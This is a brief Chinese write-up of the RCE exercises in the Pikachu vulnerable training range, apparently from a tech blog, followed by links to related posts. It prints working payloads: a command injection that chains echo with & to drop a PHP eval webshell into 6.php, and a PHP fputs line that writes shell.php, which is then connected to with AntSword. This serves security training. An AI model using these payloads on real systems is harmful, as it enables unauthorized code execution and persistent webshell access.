Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
其实防守也摸鱼8 小时前
网络安全与数据库运维核心知识点总结(附习题)
运维·网络·数据库·笔记·安全·web安全
面向对象World8 小时前
养虾从入门到放弃(Windows&Ubuntu)
linux·运维·ubuntu
Hello.Reader8 小时前
Windows C 盘空间告急?用 PowerShell 写一个安全可控的清理脚本
c语言·windows·安全
Danileaf_Guo8 小时前
Ubuntu 26.04桌面版部署
linux·运维·服务器·ubuntu
busy dog~乌鸦~8 小时前
【THM-课程内容&答案】:Web Hacking Fundamentals-Upload Vulnerabilities-Filtering
安全·web安全·安全性测试
IMPYLH8 小时前
Linux 的 sync 命令
linux·运维·服务器·python·bash·运维开发
勤劳的进取家8 小时前
SSH配置
运维·网络·学习
handler018 小时前
【Linux 笔记】GDB 调试速查手册
linux·运维·c语言·c++·笔记
byoass8 小时前
文件版本管理的设计与实现:解决协同编辑丢数据的核心方案
前端·javascript·网络·数据库·安全·云计算
汽车仪器仪表相关领域8 小时前
Kvaser Memorator Pro 2xHS v2:双通道CAN FD智能记录仪,赋能华南汽车与工业总线测试升级
大数据·人工智能·功能测试·安全·汽车·压力测试·可用性测试